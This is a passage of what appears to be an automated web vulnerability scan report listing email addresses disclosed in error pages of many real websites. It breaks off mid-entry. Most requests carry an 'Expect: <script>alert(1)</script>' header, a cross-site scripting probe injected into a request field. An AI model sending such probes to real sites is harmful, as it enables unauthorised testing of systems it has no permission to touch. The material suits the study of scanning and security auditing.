25.30. http://www.hairy21.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairy21.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairy21.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.37
Date: Wed, 04 May 2011 02:02:47 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Language: en
Expires: Wed, 04 May 2011 02:02:47 GMT
Content-Length: 1020

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:root@ndu031.xpower.net" />
...[SNIP]...
<a href="mailto:root@ndu031.xpower.net">
...[SNIP]...

25.31. http://www.hamptons.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hamptons.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hamptons.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:35:26 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 515
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@hamptons.com">
...[SNIP]...

25.32. http://www.handson.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.handson.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.handson.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid/2.7.STABLE9
Date: Wed, 04 May 2011 02:17:10 GMT
Content-Type: text/html
Content-Length: 1659
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from att-prodvmweb01.rack2.mforma.com
X-Cache-Lookup: NONE from att-prodvmweb01.rack2.mforma.com:80
Via: 1.0 att-prodvmweb01.rack2.mforma.com:80 (squid/2.7.STABLE9)
Connection: close
Set-Cookie: BIGipServerport_80_handson=2802493632.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested
...[SNIP]...
<a href="mailto:root@gotvnetworks.com%W">root@gotvnetworks.com</a>
...[SNIP]...

25.33. http://www.hannibal.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hannibal.net
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hannibal.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid
Date: Wed, 04 May 2011 00:44:07 GMT
Content-Type: text/html
Content-Length: 1391
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache7.ghm.zope.net
Via: 1.0 cache7.ghm.zope.net:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...
<A HREF="mailto:sa@zope.com">sa@zope.com</A>
...[SNIP]...

25.34. http://www.heredomination.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heredomination.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.heredomination.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Wed, 04 May 2011 01:44:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8784
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Wed, 04 May 2011 01:44:02 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Domination Pictures</title>

...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20heredomination.com">
...[SNIP]...

25.35. http://www.herenextdoor.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herenextdoor.tv
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herenextdoor.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Wed, 04 May 2011 01:52:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8749
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Wed, 04 May 2011 01:52:52 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Next Door Videos</title>
<!-
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20herenextdoor.tv">
...[SNIP]...

25.36. http://www.hereteens.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hereteens.tv
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hereteens.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.1
Date: Wed, 04 May 2011 00:39:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8826
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Wed, 04 May 2011 00:39:41 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Teens Movies</title>
<!-- SR
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20hereteens.tv">
...[SNIP]...

25.37. http://www.hotrapevideos.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotrapevideos.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hotrapevideos.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:31:58 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.2.14
Content-Length: 528
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@domain.com">
...[SNIP]...

25.38. http://www.intermedia.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intermedia.net
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.intermedia.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=2592000
Content-Length: 17340
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
z: 1
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: *
Date: Wed, 04 May 2011 01:23:42 GMT


<!doctype html>
<!--[if IE]><![endif]-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="">
<meta name="description" content="Request
...[SNIP]...
<a href="mailto:sitefeedback@intermedia.net">sitefeedback@intermedia.net</a>
...[SNIP]...

25.39. http://www.jonsontube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jonsontube.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jonsontube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Wed, 04 May 2011 01:11:43 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 327

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.40. http://www.kontrolfreek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kontrolfreek.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kontrolfreek.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18615
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQABRACT=JCJFOKFAOAJNIGBNOEGNJGBI; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:13:30 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Xbox 360 & PS3
...[SNIP]...
<A HREF="info@kontrolfreek.com">info@kontrolfreek.com</A>
...[SNIP]...

25.41. http://www.ladyboyclipz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ladyboyclipz.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ladyboyclipz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:39:08 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8
Content-Type: text/html; charset=iso-8859-1
Content-Length: 502

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.42. http://www.luxasian.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.luxasian.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.luxasian.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:03:26 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10
Content-Type: text/html; charset=iso-8859-1
Content-Length: 498

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.43. http://www.manhunt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manhunt.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manhunt.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:01:46 GMT
Server: Apache/2.2.10 (Unix)
Content-Length: 509
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: sramigpsy=325978634.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:support@manhunt.net">
...[SNIP]...

25.44. http://www.meadvilletribune.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meadvilletribune.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.meadvilletribune.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid
Date: Wed, 04 May 2011 01:19:23 GMT
Content-Type: text/html
Content-Length: 1400
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache4.peak.zope.net
Via: 1.0 cache4.peak.zope.net:8500 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...
<A HREF="mailto:sa@zope.com">sa@zope.com</A>
...[SNIP]...

25.45. http://www.medicalcareersdirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medicalcareersdirect.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medicalcareersdirect.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Server: nginx/0.7.67
Date: Wed, 04 May 2011 03:07:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Cookie,Accept-Encoding
Content-Length: 6178


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
       <title>Medi
...[SNIP]...
<p>
       If you continue to have problems, please contact us at: info@careerhvac.com
   </p>
...[SNIP]...

25.46. http://www.miami-dadeclerk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.miami-dadeclerk.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.miami-dadeclerk.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:52:01 GMT
Content-Length: 2346
Set-Cookie: NSC_xxxsfejs.njbnjebef.hpw=ffffffff09303f0a45525d5f4f58455e445a4a423660;Version=1;Max-Age=1800;path=/
Set-Cookie: citrix_ns_id=V+5+H+LLAolmpwUFYx1d0f3m9MIA1; Domain=.miami-dadeclerk.com; Path=/; HttpOnly
X-Expires-Orig: None
Cache-Control: max-age=3, must-revalidate, private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<a href="mailto:webmaster@miamidade.gov">webmaster@miamidade.gov</a>
...[SNIP]...

25.47. http://www.mylovedhair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedhair.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedhair.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Wed, 04 May 2011 03:07:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8734
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Wed, 04 May 2011 03:07:15 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Hair Pictures</title>
<!
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20mylovedhair.com">
...[SNIP]...

25.48. http://www.mylovedtwinks.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedtwinks.tv
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedtwinks.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Wed, 04 May 2011 01:01:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8768
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Wed, 04 May 2011 01:01:26 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Twinks Movies</title>
<!
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20mylovedtwinks.tv">
...[SNIP]...

25.49. http://www.nhrmc.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nhrmc.org
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nhrmc.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:37:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!--
    Build Date: 12/29/2010 10:47:56 AM
SiteMaker Release: SM7.1

Code created by:
Medseek, Inc.
2028 Village Lane
Solvang, CA. 93463
Phone 1-888 MEDSEEK
email info@medseek.com
http://www.medseek.com
(c) 1999-2010 Medseek, Inc. All rights reserved.
    -->
...[SNIP]...

25.50. http://www.oakridger.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oakridger.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oakridger.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid
Date: Wed, 04 May 2011 03:24:29 GMT
Content-Type: text/html
Content-Length: 1392
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache6.ghm.zope.net
Via: 1.0 cache6.ghm.zope.net:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...
<A HREF="mailto:sa@zope.com">sa@zope.com</A>
...[SNIP]...

25.51. http://www.okdhs.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.okdhs.org
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.okdhs.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:46:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ph4tfmftp0sozs55kx2mbkb1; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6642


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>OKDHS 404
...[SNIP]...
<A title='Notify OKDHS Web Content Unit About a Broken Hyperlink' href='mailto:Webcontent@okdhs.org?Subject=ERROR: Page (location=www.okdhs.org:80/favicon.ico) not found'>
...[SNIP]...

25.52. http://www.panews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.panews.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.panews.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid
Date: Wed, 04 May 2011 01:24:05 GMT
Content-Type: text/html
Content-Length: 1390
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache3.peak.zope.net
Via: 1.0 cache3.peak.zope.net:8500 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...
<A HREF="mailto:sa@zope.com">sa@zope.com</A>
...[SNIP]...

25.53. http://www.phonesale.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phonesale.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phonesale.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 2122
Content-Type: text/html
Expires: Wed, 04 May 2011 01:41:35 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCRCDRQR=MBNPHIJDLEAKOHLDBDEJOHAM; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:41:34 GMT


<!--include virtual="/includes/template/top.asp"-->
<!--include virtual="/includes/asp/inc_CDOsend.asp"-->
<table width="950" border="0" cellspacing="0" cellpadding="0">
<tr>
   <td width=
...[SNIP]...
<a href="mailto:webmaster@PhoneSale.com?subject=From%20ASP%20Error%20Page">
...[SNIP]...
<a href="mailto:webmaster@PhoneSale.com?subject=From%20ASP%20Error%20Page">
...[SNIP]...

25.54. http://www.plantdelights.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.plantdelights.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.plantdelights.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 04:14:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 42258
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSADCASDB=FOKNBCODECJECPPBIEPGHIJG; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

   <base href="http://www.plantdelights
...[SNIP]...
<A href="http://www.plantdelights.com/contactus.asp" class="topnav1">office@plantdelights.com</A>
...[SNIP]...

25.55. http://www.quantumjumping.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 40088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" >
<head>
               <script
...[SNIP]...
<a href="mailto:info@mindvalley.com">info@mindvalley.com</a>
...[SNIP]...

25.56. http://www.quantumjumping.com/blog/wp-content/plugins/MV-sticky-footer/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/plugins/MV-sticky-footer/jquery.cookie.js

Issue detail

